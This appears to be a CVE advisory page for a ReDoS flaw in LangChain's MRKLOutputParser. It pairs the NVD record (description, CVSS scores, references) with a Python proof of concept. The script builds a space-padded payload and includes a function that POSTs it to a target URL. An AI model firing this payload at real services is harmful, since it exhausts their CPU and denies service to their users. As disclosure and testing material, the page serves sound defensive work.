CVE-2024-58340

import re import time import requests # Vulnerable regex pattern from LangChain MRKLOutputParser # This pattern has catastrophic backtracking issues VULNERABLE_PATTERN = r'\s*\n?\s*Action:\s*(.+?)\n?\s*Action Input:\s*(.+?)(?:\n\s*\n?|\Z)' # PoC payload that triggers ReDoS # The many spaces cause the regex to backtrack exponentially def generate_redos_payload(num_spaces=100): return f"""Thought: Let me help you Action: calculator Action Input: 1 + 1{' ' * num_spaces}Extra text that doesn't match""" def test_redos(): payload = generate_redos_payload(100) print(f"Testing payload length: {len(payload)} characters") start_time = time.time() try: # This will cause significant delay due to ReDoS match = re.search(VULNERABLE_PATTERN, payload, re.DOTALL) elapsed = time.time() - start_time print(f"Match completed in {elapsed:.4f} seconds") except: elapsed = time.time() - start_time print(f"Regex timeout or error after {elapsed:.4f} seconds") # Simulate HTTP request to vulnerable endpoint def exploit_via_http(target_url): """ Exploit the ReDoS vulnerability via HTTP request In real attack scenario, this would be sent to a LangChain application that processes LLM output with MRKLOutputParser """ payload = generate_redos_payload(200) # Example POST request to vulnerable endpoint response = requests.post( target_url, json={'user_input': payload, 'use_parser': True}, timeout=30 ) return response if __name__ == "__main__": print("CVE-2024-58340 ReDoS PoC") print("=" * 50) test_redos()

{"cve": {"id": "CVE-2024-58340", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:51.780", "lastModified": "2026-01-21T17:57:56.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangChain versions up to and including 0.3.1 contain a regular expression denial-of-service (ReDoS) vulnerability in the MRKLOutputParser.parse() method (libs/langchain/langchain/agents/mrkl/output_parser.py). The parser applies a backtracking-prone regular expression when extracting tool actions from model output. An attacker who can supply or influence the parsed text (for example via prompt injection in downstream applications that pass LLM output directly into MRKLOutputParser.parse()) can trigger excessive CPU consumption by providing a crafted payload, causing significant parsing delays and a denial-of-service condition."}, {"lang": "es", "value": "Las versiones de LangChain hasta la 0.3.1 inclusive contienen una vulnerabilidad de denegación de servicio por expresión regular (ReDoS) en el método MRKLOutputParser.parse() (libs/langchain/langchain/agents/mrkl/output_parser.py). El analizador aplica una expresión regular propensa a retrocesos al extraer acciones de herramientas de la salida del modelo. Un atacante que puede suministrar o influir en el texto analizado (por ejemplo, mediante inyección de prompt en aplicaciones posteriores que pasan la salida del LLM directamente a MRKLOutputParser.parse()) puede desencadenar un consumo excesivo de CPU al proporcionar una carga útil manipulada, causando retrasos significativos en el análisis y una condición de denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1333"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langchain:langchain:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.3.1", "matchCriteriaId": "6E9D0E05-1453-4F45-BA4F-C188E1639974"}]}]}], "references": [{"url": "https://github.com/langchain-ai/langchain", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://huntr.com/bounties/e7ece02c-d4bb-4166-8e08-6baf4f8845bb", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://www.langchain.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/langchain-mrkloutputparser-redos", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}